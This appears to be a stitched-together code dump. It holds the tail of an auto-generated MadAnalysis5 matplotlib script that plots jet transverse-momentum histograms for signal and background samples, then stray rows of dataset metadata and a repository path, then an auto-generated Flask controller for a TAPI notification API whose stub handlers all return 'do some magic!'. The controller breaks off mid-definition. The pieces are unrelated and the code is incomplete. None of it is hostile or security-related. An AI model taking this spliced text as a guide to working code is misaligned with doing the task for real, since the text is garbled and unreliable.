.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0]) # Creating weights for histo: y1_PT_19 y1_PT_19_weights = 
numpy.array([0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.0,0.000113599034018,5.67830673105e-05,0.000113737731341,0.000170367485976,0.000141884881145,0.000481802982601,0.000621862920074,0.000511166622891,0.000284079239418,0.000620465549742,0.000312218843897,0.000482608757904,0.000534552078816,0.000567898105729,0.000537094021404,0.000622539474269,0.000426019418286,0.000763286065978,0.000991075402277,0.000566370623108,0.000738178553119,0.000651580804438,0.000819445262688,0.000568163528857,0.000710387845633,0.000482653465437,0.000625761684302,0.000880939063231,0.000539583087308,0.000652760875366,0.000509589085657,0.000711199413607,0.000537738493117,0.000766169924648,0.000735821233333,0.000567344831443,0.000537023024059,0.000397452790028,0.000454063517968,0.000398671181699,0.000453985688243,0.00050873191897,0.000624292276915,0.000255779965179,0.000454444200384,0.000511375604615,0.000480740101851,0.000397267573106,0.00019904209555,0.000369045088882,0.000454098125461,0.000395649338649,0.000397488140171,0.000312183939345,0.000369384628484,0.000340048763306,0.000283905013717,0.000398740693743,0.000311979116461,0.000368800757015,0.000340553171219,0.000226727792319,0.000283567107944,0.000510731132902,0.000312611111653,0.000311463568797,0.000312540411368,0.000509680580143,0.000397491704891,0.000422167441011,0.00034071551452,0.000368923442804,0.000454020295736,0.000455800279373,0.000567545346956,0.000312241123399,0.000596324967247,0.000367731638005,0.000424484212104,0.000481536668293,0.000312289989772,0.000311889255805,0.000196529264844,0.000424352763046,0.000227314485858,0.000255551526023,0.000395912682357,0.000283760939607,0.000254231242766,0.000311615366467,0.000369366507823,0.000226934546093,0.000170234551617,0.00014177532541,0.000112250025057,0.000113650544226,0.00014194796184,0.000225730561833,0.000255443396176,0.000226977174206,8.35984079281e-05,8.48569472602e-05,2.83770742588e-05,5.68149418506e-05,2.84575181121e-05,0.000141639643246,0.00019843282545,8.53120877693e-05,8.43218381939e-05,8.51811288596e-05,8.48250727201e-05,2.83584485955e-05,2.83770742588e-05,2.84059930517e-05,2.81710185762e-05,8.51708357299e-05,5.69150362242e-05,5.68635111638e-05,5.68226951171e-05]) # Creating a new Canvas fig = plt.figure(figsize=(12,6),dpi=80) frame = gridspec.GridSpec(1,1,right=0.7) pad = fig.add_subplot(frame[0]) # Creating a new Stack pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights+y1_PT_8_weights+y1_PT_9_weights+y1_PT_10_weights+y1_PT_11_weights+y1_PT_12_weights+y1_PT_13_weights+y1_PT_14_weights+y1_PT_15_weights+y1_PT_16_weights+y1_PT_17_weights+y1_PT_18_weights+y1_PT_19_weights,\ label="$bg\_vbf\_1600\_inf$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#ccc6aa", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, 
weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights+y1_PT_8_weights+y1_PT_9_weights+y1_PT_10_weights+y1_PT_11_weights+y1_PT_12_weights+y1_PT_13_weights+y1_PT_14_weights+y1_PT_15_weights+y1_PT_16_weights+y1_PT_17_weights+y1_PT_18_weights,\ label="$bg\_vbf\_1200\_1600$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#c1bfa8", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights+y1_PT_8_weights+y1_PT_9_weights+y1_PT_10_weights+y1_PT_11_weights+y1_PT_12_weights+y1_PT_13_weights+y1_PT_14_weights+y1_PT_15_weights+y1_PT_16_weights+y1_PT_17_weights,\ label="$bg\_vbf\_800\_1200$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#bab5a3", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights+y1_PT_8_weights+y1_PT_9_weights+y1_PT_10_weights+y1_PT_11_weights+y1_PT_12_weights+y1_PT_13_weights+y1_PT_14_weights+y1_PT_15_weights+y1_PT_16_weights,\ label="$bg\_vbf\_600\_800$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#b2a596", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights+y1_PT_8_weights+y1_PT_9_weights+y1_PT_10_weights+y1_PT_11_weights+y1_PT_12_weights+y1_PT_13_weights+y1_PT_14_weights+y1_PT_15_weights,\ label="$bg\_vbf\_400\_600$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#b7a39b", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights+y1_PT_8_weights+y1_PT_9_weights+y1_PT_10_weights+y1_PT_11_weights+y1_PT_12_weights+y1_PT_13_weights+y1_PT_14_weights,\ label="$bg\_vbf\_200\_400$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#ad998c", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights+y1_PT_8_weights+y1_PT_9_weights+y1_PT_10_weights+y1_PT_11_weights+y1_PT_12_weights+y1_PT_13_weights,\ label="$bg\_vbf\_100\_200$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#9b8e82", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights+y1_PT_8_weights+y1_PT_9_weights+y1_PT_10_weights+y1_PT_11_weights+y1_PT_12_weights,\ label="$bg\_vbf\_0\_100$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#876656", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") 
pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights+y1_PT_8_weights+y1_PT_9_weights+y1_PT_10_weights+y1_PT_11_weights,\ label="$bg\_dip\_1600\_inf$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#afcec6", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights+y1_PT_8_weights+y1_PT_9_weights+y1_PT_10_weights,\ label="$bg\_dip\_1200\_1600$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#84c1a3", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights+y1_PT_8_weights+y1_PT_9_weights,\ label="$bg\_dip\_800\_1200$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#89a8a0", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights+y1_PT_8_weights,\ label="$bg\_dip\_600\_800$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#829e8c", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights,\ label="$bg\_dip\_400\_600$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#adbcc6", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights,\ label="$bg\_dip\_200\_400$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#7a8e99", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights,\ label="$bg\_dip\_100\_200$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#758991", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights,\ label="$bg\_dip\_0\_100$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#688296", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights,\ label="$signal\_2pt4TeVL$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#6d7a84", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights,\ label="$signal\_2pt2TeVL$", histtype="step", rwidth=1.0,\ 
color=None, edgecolor="#7c99d1", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights+y1_PT_1_weights,\ label="$signal\_2TeVL$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#7f7f9b", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") pad.hist(x=xData, bins=xBinning, weights=y1_PT_0_weights,\ label="$signal\_1pt8TeVL$", histtype="step", rwidth=1.0,\ color=None, edgecolor="#aaa5bf", linewidth=1, linestyle="solid",\ bottom=None, cumulative=False, normed=False, align="mid", orientation="vertical") # Axis plt.rc('text',usetex=False) plt.xlabel(r"p_{T} [ j_{1} ] ( GeV ) ",\ fontsize=16,color="black") plt.ylabel(r"$\mathrm{Events}$ $(\mathcal{L}_{\mathrm{int}} = 40.0\ \mathrm{fb}^{-1})$ ",\ fontsize=16,color="black") # Boundary of y-axis ymax=(y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights+y1_PT_8_weights+y1_PT_9_weights+y1_PT_10_weights+y1_PT_11_weights+y1_PT_12_weights+y1_PT_13_weights+y1_PT_14_weights+y1_PT_15_weights+y1_PT_16_weights+y1_PT_17_weights+y1_PT_18_weights+y1_PT_19_weights).max()*1.1 ymin=0 # linear scale #ymin=min([x for x in (y1_PT_0_weights+y1_PT_1_weights+y1_PT_2_weights+y1_PT_3_weights+y1_PT_4_weights+y1_PT_5_weights+y1_PT_6_weights+y1_PT_7_weights+y1_PT_8_weights+y1_PT_9_weights+y1_PT_10_weights+y1_PT_11_weights+y1_PT_12_weights+y1_PT_13_weights+y1_PT_14_weights+y1_PT_15_weights+y1_PT_16_weights+y1_PT_17_weights+y1_PT_18_weights+y1_PT_19_weights) if x])/100. # log scale plt.gca().set_ylim(ymin,ymax) # Log/Linear scale for X-axis plt.gca().set_xscale("linear") #plt.gca().set_xscale("log",nonposx="clip") # Log/Linear scale for Y-axis plt.gca().set_yscale("linear") #plt.gca().set_yscale("log",nonposy="clip") # Legend plt.legend(bbox_to_anchor=(1.05,1), loc=2, borderaxespad=0.) # Saving the image plt.savefig('../../HTML/MadAnalysis5job_0/selection_0.png') plt.savefig('../../PDF/MadAnalysis5job_0/selection_0.png') plt.savefig('../../DVI/MadAnalysis5job_0/selection_0.eps') # Running! if __name__ == '__main__': selection_0()
228
3,169
0.758329
10,600
49,704
3.467264
0.166981
0.261094
0.387152
0.510326
0.369956
0.342095
0.338421
0.323402
0.316872
0.314995
0
0.606738
0.037945
49,704
217
3,170
229.050691
0.161864
0.029072
0
0.171875
0
0.007813
0.024492
0.004148
0
0
0
0
0
1
0.007813
false
0
0.03125
0
0.039063
0
0
0
0
null
1
1
1
0
0
0
0
0
0
0
1
0
0
0
1
1
1
0
0
0
0
0
0
0
null
0
0
0
0
0
0
0
0
0
0
0
0
0
7
f9e4102660ff658ab7db455635825948c308bfcd
31,443
py
Python
RI/flask_server/tapi_server/controllers/tapi_notification_controller.py
arthurMll/TAPI
e1171bb139c6791a953af09cfc2bc7ad928da73d
[ "Apache-2.0" ]
57
2018-04-09T08:56:18.000Z
2022-03-23T08:31:06.000Z
RI/flask_server/tapi_server/controllers/tapi_notification_controller.py
arthurMll/TAPI
e1171bb139c6791a953af09cfc2bc7ad928da73d
[ "Apache-2.0" ]
143
2016-06-08T04:09:54.000Z
2018-02-23T10:45:59.000Z
RI/flask_server/tapi_server/controllers/tapi_notification_controller.py
arthurMll/TAPI
e1171bb139c6791a953af09cfc2bc7ad928da73d
[ "Apache-2.0" ]
64
2018-03-07T07:55:17.000Z
2022-03-28T07:14:28.000Z
import connexion
import six

from tapi_server.models.inline_object19 import InlineObject19  # noqa: E501
from tapi_server.models.inline_object2 import InlineObject2  # noqa: E501
from tapi_server.models.inline_object20 import InlineObject20  # noqa: E501
from tapi_server.models.inline_object28 import InlineObject28  # noqa: E501
from tapi_server.models.inline_object7 import InlineObject7  # noqa: E501
from tapi_server.models.tapi_common_name_and_value import TapiCommonNameAndValue  # noqa: E501
from tapi_server.models.tapi_notification_alarm_info import TapiNotificationAlarmInfo  # noqa: E501
from tapi_server.models.tapi_notification_create_notification_subscription_service import TapiNotificationCreateNotificationSubscriptionService  # noqa: E501
from tapi_server.models.tapi_notification_delete_notification_subscription_service import TapiNotificationDeleteNotificationSubscriptionService  # noqa: E501
from tapi_server.models.tapi_notification_get_notification_list import TapiNotificationGetNotificationList  # noqa: E501
from tapi_server.models.tapi_notification_get_notification_subscription_service_details import TapiNotificationGetNotificationSubscriptionServiceDetails  # noqa: E501
from tapi_server.models.tapi_notification_get_notification_subscription_service_list import TapiNotificationGetNotificationSubscriptionServiceList  # noqa: E501
from tapi_server.models.tapi_notification_get_supported_notification_types import TapiNotificationGetSupportedNotificationTypes  # noqa: E501
from tapi_server.models.tapi_notification_name_and_value_change import TapiNotificationNameAndValueChange  # noqa: E501
from tapi_server.models.tapi_notification_notification import TapiNotificationNotification  # noqa: E501
from tapi_server.models.tapi_notification_notification_channel import TapiNotificationNotificationChannel  # noqa: E501
from tapi_server.models.tapi_notification_notification_context import TapiNotificationNotificationContext  # noqa: E501
from tapi_server.models.tapi_notification_notification_subscription_service import TapiNotificationNotificationSubscriptionService  # noqa: E501
from tapi_server.models.tapi_notification_subscription_filter import TapiNotificationSubscriptionFilter  # noqa: E501
from tapi_server.models.tapi_notification_tca_info import TapiNotificationTcaInfo  # noqa: E501
from tapi_server.models.tapi_notification_update_notification_subscription_service import TapiNotificationUpdateNotificationSubscriptionService  # noqa: E501
from tapi_server import util


def data_context_notification_context_delete():  # noqa: E501
    """data_context_notification_context_delete

    removes tapi.notification.NotificationContext  # noqa: E501

    :rtype: None
    """
    return 'do some magic!'


def data_context_notification_context_get():  # noqa: E501
    """data_context_notification_context_get

    returns tapi.notification.NotificationContext  # noqa: E501

    :rtype: TapiNotificationNotificationContext
    """
    return 'do some magic!'
def data_context_notification_context_notif_subscription_post(tapi_notification_notification_subscription_service=None): # noqa: E501 """data_context_notification_context_notif_subscription_post creates tapi.notification.NotificationSubscriptionService # noqa: E501 :param tapi_notification_notification_subscription_service: tapi.notification.NotificationSubscriptionService to be added to list :type tapi_notification_notification_subscription_service: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_notification_notification_subscription_service = TapiNotificationNotificationSubscriptionService.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_delete(uuid): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_delete removes tapi.notification.NotificationSubscriptionService # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :rtype: None """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_get(uuid): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_get returns tapi.notification.NotificationSubscriptionService # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :rtype: TapiNotificationNotificationSubscriptionService """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_name_post(uuid, tapi_common_name_and_value=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_name_post creates tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list :type tapi_common_name_and_value: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_namevalue_name_delete(uuid, value_name): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_namevalue_name_delete removes tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param value_name: Id of name :type value_name: str :rtype: None """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_namevalue_name_get(uuid, value_name): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_namevalue_name_get returns tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param value_name: Id of name :type value_name: str :rtype: TapiCommonNameAndValue """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_namevalue_name_post(uuid, value_name, tapi_common_name_and_value=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_namevalue_name_post creates tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param value_name: Id of name :type value_name: str :param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list :type tapi_common_name_and_value: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' 
def data_context_notification_context_notif_subscriptionuuid_namevalue_name_put(uuid, value_name, tapi_common_name_and_value=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_namevalue_name_put creates or updates tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param value_name: Id of name :type value_name: str :param tapi_common_name_and_value: tapi.common.NameAndValue to be added or updated :type tapi_common_name_and_value: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notification_channel_delete(uuid): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notification_channel_delete removes tapi.notification.NotificationChannel # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :rtype: None """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notification_channel_get(uuid): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notification_channel_get returns tapi.notification.NotificationChannel # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :rtype: TapiNotificationNotificationChannel """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notification_channel_name_post(uuid, tapi_common_name_and_value=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notification_channel_name_post creates tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list :type tapi_common_name_and_value: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notification_channel_namevalue_name_delete(uuid, value_name): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notification_channel_namevalue_name_delete removes tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param value_name: Id of name :type value_name: str :rtype: None """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notification_channel_namevalue_name_get(uuid, value_name): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notification_channel_namevalue_name_get returns tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param value_name: Id of name :type value_name: str :rtype: TapiCommonNameAndValue """ return 'do some magic!' 
def data_context_notification_context_notif_subscriptionuuid_notification_channel_namevalue_name_post(uuid, value_name, tapi_common_name_and_value=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notification_channel_namevalue_name_post creates tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param value_name: Id of name :type value_name: str :param tapi_common_name_and_value: tapi.common.NameAndValue to be added to list :type tapi_common_name_and_value: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notification_channel_namevalue_name_put(uuid, value_name, tapi_common_name_and_value=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notification_channel_namevalue_name_put creates or updates tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param value_name: Id of name :type value_name: str :param tapi_common_name_and_value: tapi.common.NameAndValue to be added or updated :type tapi_common_name_and_value: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_common_name_and_value = TapiCommonNameAndValue.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notification_channel_post(uuid, tapi_notification_notification_channel=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notification_channel_post creates tapi.notification.NotificationChannel # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param tapi_notification_notification_channel: tapi.notification.NotificationChannel to be added to list :type tapi_notification_notification_channel: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_notification_notification_channel = TapiNotificationNotificationChannel.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notification_channel_put(uuid, tapi_notification_notification_channel=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notification_channel_put creates or updates tapi.notification.NotificationChannel # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param tapi_notification_notification_channel: tapi.notification.NotificationChannel to be added or updated :type tapi_notification_notification_channel: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_notification_notification_channel = TapiNotificationNotificationChannel.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notificationnotification_uuid_additional_infovalue_name_get(uuid, notification_uuid, value_name): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notificationnotification_uuid_additional_infovalue_name_get returns tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param notification_uuid: Id of notification :type notification_uuid: str :param value_name: Id of additional-info :type value_name: str :rtype: TapiCommonNameAndValue """ return 'do some magic!' 
def data_context_notification_context_notif_subscriptionuuid_notificationnotification_uuid_alarm_info_get(uuid, notification_uuid): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notificationnotification_uuid_alarm_info_get returns tapi.notification.AlarmInfo # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param notification_uuid: Id of notification :type notification_uuid: str :rtype: TapiNotificationAlarmInfo """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notificationnotification_uuid_changed_attributesvalue_name_get(uuid, notification_uuid, value_name): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notificationnotification_uuid_changed_attributesvalue_name_get returns tapi.notification.NameAndValueChange # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param notification_uuid: Id of notification :type notification_uuid: str :param value_name: Id of changed-attributes :type value_name: str :rtype: TapiNotificationNameAndValueChange """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notificationnotification_uuid_get(uuid, notification_uuid): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notificationnotification_uuid_get returns tapi.notification.Notification # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param notification_uuid: Id of notification :type notification_uuid: str :rtype: TapiNotificationNotification """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notificationnotification_uuid_namevalue_name_get(uuid, notification_uuid, value_name): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notificationnotification_uuid_namevalue_name_get returns tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param notification_uuid: Id of notification :type notification_uuid: str :param value_name: Id of name :type value_name: str :rtype: TapiCommonNameAndValue """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notificationnotification_uuid_target_object_namevalue_name_get(uuid, notification_uuid, value_name): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notificationnotification_uuid_target_object_namevalue_name_get returns tapi.common.NameAndValue # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param notification_uuid: Id of notification :type notification_uuid: str :param value_name: Id of target-object-name :type value_name: str :rtype: TapiCommonNameAndValue """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_notificationnotification_uuid_tca_info_get(uuid, notification_uuid): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_notificationnotification_uuid_tca_info_get returns tapi.notification.TcaInfo # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param notification_uuid: Id of notification :type notification_uuid: str :rtype: TapiNotificationTcaInfo """ return 'do some magic!' 
def data_context_notification_context_notif_subscriptionuuid_post(uuid, tapi_notification_notification_subscription_service=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_post creates tapi.notification.NotificationSubscriptionService # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param tapi_notification_notification_subscription_service: tapi.notification.NotificationSubscriptionService to be added to list :type tapi_notification_notification_subscription_service: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_notification_notification_subscription_service = TapiNotificationNotificationSubscriptionService.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_put(uuid, tapi_notification_notification_subscription_service=None): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_put creates or updates tapi.notification.NotificationSubscriptionService # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :param tapi_notification_notification_subscription_service: tapi.notification.NotificationSubscriptionService to be added or updated :type tapi_notification_notification_subscription_service: dict | bytes :rtype: None """ if connexion.request.is_json: tapi_notification_notification_subscription_service = TapiNotificationNotificationSubscriptionService.from_dict(connexion.request.get_json()) # noqa: E501 return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_subscription_filter_delete(uuid): # noqa: E501 """data_context_notification_context_notif_subscriptionuuid_subscription_filter_delete removes tapi.notification.SubscriptionFilter # noqa: E501 :param uuid: Id of notif-subscription :type uuid: str :rtype: None """ return 'do some magic!' def data_context_notification_context_notif_subscriptionuuid_subscription_filter_get(uuid): # 